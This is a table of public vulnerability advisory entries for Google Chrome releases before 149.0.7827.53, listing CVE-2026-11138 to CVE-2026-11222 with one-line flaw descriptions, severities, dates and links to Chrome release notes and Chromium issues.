| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11138 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501650354 |
| Google--Chrome | Inappropriate implementation in Paint in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11139 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501650594 |
| Google--Chrome | Out of bounds read in Chromecast in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11140 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501659253 |
| Google--Chrome | Uninitialized Use in Audio in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11141 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501667839 |
| Google--Chrome | Insufficient policy enforcement in Paint in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11142 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501668745 |
| Google--Chrome | Out of bounds read in Extensions in Google Chrome on Linux prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information from process memory via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11143 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501674219 |
| Google--Chrome | Use after free in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted video file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11144 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501676175 |
| Google--Chrome | Race in Geolocation in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11145 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501683745 |
| Google--Chrome | Insufficient validation of untrusted input in Chromoting in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11146 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501709220 |
| Google--Chrome | Use after free in WebML in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11147 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501731689 |
| Google--Chrome | Inappropriate implementation in Payments in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11148 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501738451 |
| Google--Chrome | Insufficient validation of untrusted input in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform privilege escalation via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11149 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501739206 |
| Google--Chrome | Inappropriate implementation in XML in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11150 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501740299 |
| Google--Chrome | Insufficient validation of untrusted input in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11151 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501740323 |
| Google--Chrome | Object lifecycle issue in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11152 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501762953 |
| Google--Chrome | Side-channel information leakage in Forms in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11153 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501779840 |
| Google--Chrome | Use after free in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11154 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501789156 |
| Google--Chrome | Inappropriate implementation in CSS in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11155 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501801823 |
| Google--Chrome | Inappropriate implementation in CSS in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11156 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501810226 |
| Google--Chrome | Script injection in Accessibility in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to inject arbitrary scripts or HTML (UXSS) via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11157 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501823385 |
| Google--Chrome | Insufficient validation of untrusted input in Downloads in Google Chrome on Mac prior to 149.0.7827.53 allowed a local attacker to potentially perform a sandbox escape via a crafted AppleScript command. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11158 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501844153 |
| Google--Chrome | Uninitialized Use in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11159 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501861921 |
| Google--Chrome | Out of bounds read in Input in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11160 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501862016 |
| Google--Chrome | Inappropriate implementation in DataTransfer in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11161 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501920294 |
| Google--Chrome | Inappropriate implementation in CSS in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11162 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502035074 |
| Google--Chrome | Use after free in Messages in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11163 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502072755 |
| Google--Chrome | Use after free in Blink in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11164 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502089411 |
| Google--Chrome | Use after free in WebMIDI in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11165 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502099949 |
| Google--Chrome | Inappropriate implementation in SVG in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11166 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502118936 |
| Google--Chrome | Inappropriate implementation in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11167 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502228856 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11168 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502256049 |
| Google--Chrome | Inappropriate implementation in XML in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted XML file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11169 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502285273 |
| Google--Chrome | Inappropriate implementation in Chromoting in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to perform OS-level privilege escalation via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11170 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502322596 |
| Google--Chrome | Integer overflow in Blink in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11171 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502322843 |
| Google--Chrome | Incorrect security UI in Contact Picker in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11172 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502328201 |
| Google--Chrome | Out of bounds write in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11173 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502337304 |
| Google--Chrome | Inappropriate implementation in Site Isolation in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11174 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502348223 |
| Google--Chrome | Incorrect security UI in Messages in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11175 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502368088 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11176 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502371717 |
| Google--Chrome | Use after free in Omnibox in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11177 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502449864 |
| Google--Chrome | Insufficient policy enforcement in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11178 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502501810 |
| Google--Chrome | Inappropriate implementation in ORB in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11179 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502615170 |
| Google--Chrome | Inappropriate implementation in SVG in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11180 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502631225 |
| Google--Chrome | Inappropriate implementation in Media Session in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11181 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502633299 |
| Google--Chrome | Inappropriate implementation in SVG in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11182 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502651014 |
| Google--Chrome | Out of bounds read in GWP-ASan in Google Chrome prior to 149.0.7827.53 allowed a local attacker to obtain potentially sensitive information from process memory via a malicious file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11183 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502768780 |
| Google--Chrome | Insufficient policy enforcement in Actor in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11184 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502777516 |
| Google--Chrome | Use after free in V8 in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code inside a sandbox via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11185 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502784366 |
| Google--Chrome | Inappropriate implementation in CSS in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11186 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502805170 |
| Google--Chrome | Inappropriate implementation in Glic in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11187 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502819675 |
| Google--Chrome | Use after free in USB in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11188 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502959826 |
| Google--Chrome | Insufficient validation of untrusted input in DevTools in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11189 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503197481 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to bypass discretionary access control via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11190 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503375371 |
| Google--Chrome | Out of bounds memory access in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11191 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503392431 |
| Google--Chrome | Insufficient validation of untrusted input in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11192 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503490678 |
| Google--Chrome | Insufficient policy enforcement in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11193 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503642586 |
| Google--Chrome | Inappropriate implementation in Network in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11194 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503719488 |
| Google--Chrome | Inappropriate implementation in MHTML in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11195 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503865896 |
| Google--Chrome | Type Confusion in XML in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted XML file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11196 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/503879106 |
| Google--Chrome | Insufficient policy enforcement in Workers in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11197 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504073872 |
| Google--Chrome | Insufficient validation of untrusted input in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted video file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11198 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504395300 |
| Google--Chrome | Inappropriate implementation in WebRTC in Google Chrome prior to 149.0.7827.53 allowed an attacker in a privileged network position to leak cross-origin data via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11199 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504572664 |
| Google--Chrome | Inappropriate implementation in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11200 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504579798 |
| Google--Chrome | Use after free in ServiceWorker in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11201 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505068950 |
| Google--Chrome | Inappropriate implementation in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11202 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505144022 |
| Google--Chrome | Inappropriate implementation in GPU in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11203 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505192638 |
| Google--Chrome | Inappropriate implementation in Signin in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11204 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505200733 |
| Google--Chrome | Insufficient validation of untrusted input in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to inject arbitrary scripts or HTML (UXSS) via a crafted QR code. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11205 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505290253 |
| Google--Chrome | Insufficient policy enforcement in ServiceWorker in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11206 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/505427216 |
| Google--Chrome | Insufficient validation of untrusted input in Autofill in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11207 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506127858 |
| Google--Chrome | Use after free in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11208 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506387278 |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11209 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506391032 |
| Google--Chrome | Inappropriate implementation in Safe Browsing in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass discretionary access control via a crafted RAR file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11210 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506473226 |
| Google--Chrome | Integer overflow in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11211 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/506629455 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11212 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/507216833 |
| Google--Chrome | Insufficient validation of untrusted input in Reading Mode in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11213 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/507382702 |
| Google--Chrome | Inappropriate implementation in Chrome for iOS in Google Chrome on iOS prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11214 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/508257850 |
| Google--Chrome | Inappropriate implementation in Cronet in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11215 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/513446116 |
| Google--Chrome | Incorrect security UI in File Input in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11216 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/474583539 |
| Google--Chrome | Inappropriate implementation in Fenced Frames in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11217 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/487564032 |
| Google--Chrome | Inappropriate implementation in PlatformIntegration in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a malicious file. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11218 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/476862276 |
| Google--Chrome | Inappropriate implementation in Navigation in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11219 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/480074849 |
| Google--Chrome | Insufficient validation of untrusted input in Navigation in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11220 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/487300831 |
| Google--Chrome | Insufficient validation of untrusted input in PointerLock in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11221 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/492211919 |
| Google--Chrome | Incorrect security UI in Tab Strip in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform domain spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-06-04 | not yet calculated | CVE-2026-11222 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/458442542 |
